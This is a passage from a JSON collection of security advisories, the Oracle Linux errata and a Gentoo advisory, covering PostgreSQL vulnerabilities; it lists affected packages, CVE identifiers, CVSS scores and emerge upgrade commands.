"8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-libs-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-contrib-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-tcl-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-python-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "src", "packageFilename": "postgresql-8.1.21-1.el5_5.1.src.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "src", "packageFilename": "postgresql-8.1.21-1.el5_5.1.src.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "src", "packageFilename": "postgresql-8.1.21-1.el5_5.1.src.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-server-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-pl-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-pl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "ia64", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.ia64.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-test-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "x86_64", "packageFilename": "postgresql-devel-8.1.21-1.el5_5.1.x86_64.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "8.1.21-1.el5_5.1", "arch": "i386", "packageFilename": "postgresql-8.1.21-1.el5_5.1.i386.rpm", "packageName": "postgresql", "operator": "lt"}], "description": "[8.1.21-1.el5_5.1]\n- Update to PostgreSQL 8.1.21 to fix CVE-2010-1169, CVE-2010-1170,\n CVE-2009-4136, CVE-2010-0733, CVE-2010-0442, and assorted other bugs\n described at\n http://www.postgresql.org/docs/8.1/static/release.html\nResolves: #586058", "edition": 3, "reporter": "Oracle", "published": "2010-05-19T00:00:00", "title": "postgresql security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1170", "CVE-2010-1975", "CVE-2010-1169", "CVE-2010-0442", "CVE-2010-0733", "CVE-2009-4136"], "modified": "2010-05-19T00:00:00", "id": "ELSA-2010-0429", "href": "http://linux.oracle.com/errata/ELSA-2010-0429.html", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:47:17", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-jdbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-jdbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-jdbc-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-jdbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-pl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "src", "packageFilename": "postgresql-7.4.29-1.el4_8.1.src.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "src", "packageFilename": "postgresql-7.4.29-1.el4_8.1.src.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "src", "packageFilename": "postgresql-7.4.29-1.el4_8.1.src.rpm", "packageName": "postgresql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-python-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-python", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-test-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-test", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-docs-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-docs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "i386", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.i386.rpm", "packageName": "postgresql-pl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-devel-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-contrib-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-contrib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-tcl-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-tcl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-libs-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "x86_64", "packageFilename": "postgresql-server-7.4.29-1.el4_8.1.x86_64.rpm", "packageName": "postgresql-server", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "7.4.29-1.el4_8.1", "arch": "ia64", "packageFilename": "postgresql-pl-7.4.29-1.el4_8.1.ia64.rpm", "packageName": "postgresql-pl", "operator": "lt"}], "description": "[7.4.29-1.el4_8.1]\n- Update to PostgreSQL 7.4.29 to fix CVE-2010-1169, CVE-2010-1170,\n CVE-2009-4136, CVE-2010-0733, CVE-2010-0442, and assorted other bugs\n described at\n http://www.postgresql.org/docs/7.4/static/release.html\nResolves: #586056\n[7.4.26-1.el4_8.1]\n- Update to PostgreSQL 7.4.26 to fix CVE-2009-0922, CVE-2009-3230,\n and assorted other bugs described at\n http://www.postgresql.org/docs/7.4/static/release.html\nResolves: #525282", "edition": 3, "reporter": "Oracle", "published": "2010-05-19T00:00:00", "title": "postgresql security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1170", "CVE-2010-1975", "CVE-2010-1169", "CVE-2010-0442", "CVE-2010-0733", "CVE-2009-0922", "CVE-2009-3230", "CVE-2009-4136"], "modified": "2010-05-19T00:00:00", "id": "ELSA-2010-0428", "href": "http://linux.oracle.com/errata/ELSA-2010-0428.html", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:37", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3229", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4034", "https://bugs.gentoo.org/show_bug.cgi?id=261223", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1169", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4015", "https://bugs.gentoo.org/show_bug.cgi?id=297383", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0733", "https://bugs.gentoo.org/show_bug.cgi?id=313335", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1170", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0442", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4136", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1447", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2483", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0922", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1975", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3230", "https://bugs.gentoo.org/show_bug.cgi?id=308063", "https://bugs.gentoo.org/show_bug.cgi?id=353387", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3433", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3231", "https://bugs.gentoo.org/show_bug.cgi?id=320967", "https://bugs.gentoo.org/show_bug.cgi?id=284274", "https://bugs.gentoo.org/show_bug.cgi?id=339935", "https://bugs.gentoo.org/show_bug.cgi?id=384539"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "9.0.5", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "dev-db/postgresql-base", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "9.0.5", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "dev-db/postgresql-server", "operator": "lt"}, {"OS": "Gentoo", "OSVersion": "any", "packageVersion": "9", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "dev-db/postgresql", "operator": "le"}], "edition": 1, "description": "### Background\n\nPostgreSQL is an open source object-relational database management system. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PostgreSQL. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote authenticated attacker could send a specially crafted SQL query to a PostgreSQL server with the \"intarray\" module enabled, possibly resulting in the execution of arbitrary code with the privileges of the PostgreSQL server process, or a Denial of Service condition. Furthermore, a remote authenticated attacker could execute arbitrary Perl code, cause a Denial of Service condition via different vectors, bypass LDAP authentication, bypass X.509 certificate validation, gain database privileges, exploit weak blowfish encryption and possibly cause other unspecified impact. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PostgreSQL 8.2 users should upgrade to the latest 8.2 base version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-base-8.2.22:8.2\"\n \n\nAll PostgreSQL 8.3 users should upgrade to the latest 8.3 base version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-base-8.3.16:8.3\"\n \n\nAll PostgreSQL 8.4 users should upgrade to the latest 8.4 base version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-base-8.4.9:8.4\"\n \n\nAll PostgreSQL 9.0 users should upgrade to the latest 9.0 base version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-base-9.0.5:9.0\"\n \n\nAll PostgreSQL 8.2 server users should upgrade to the latest 8.2 server version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-server-8.2.22:8.2\"\n \n\nAll PostgreSQL 8.3 server users should upgrade to the latest 8.3 server version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-server-8.3.16:8.3\"\n \n\nAll PostgreSQL 8.4 server users should upgrade to the latest 8.4 server version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-server-8.4.9:8.4\"\n \n\nAll PostgreSQL 9.0 server users should upgrade to the latest 9.0 server version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-db/postgresql-server-9.0.5:9.0\"\n \n\nThe old unsplit PostgreSQL packages have been removed from portage. Users still using them are urged to migrate to the new PostgreSQL packages as stated above and to remove the old package: \n \n \n # emerge --unmerge \"dev-db/postgresql\"", "reporter": "Gentoo Foundation", "published": "2011-10-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "PostgreSQL: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1170", "CVE-2010-1975", "CVE-2010-3433", "CVE-2010-1169", "CVE-2010-0442", "CVE-2010-0733", "CVE-2010-4015", "CVE-2009-0922", "CVE-2011-2483", "CVE-2009-3231", "CVE-2009-3230", "CVE-2009-4034", "CVE-2009-3229", "CVE-2010-1447", "CVE-2009-4136"], "modified": "2012-03-05T00:00:00", "id": "GLSA-201110-22", "href": "https://security.gentoo.org/glsa/201110-22", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}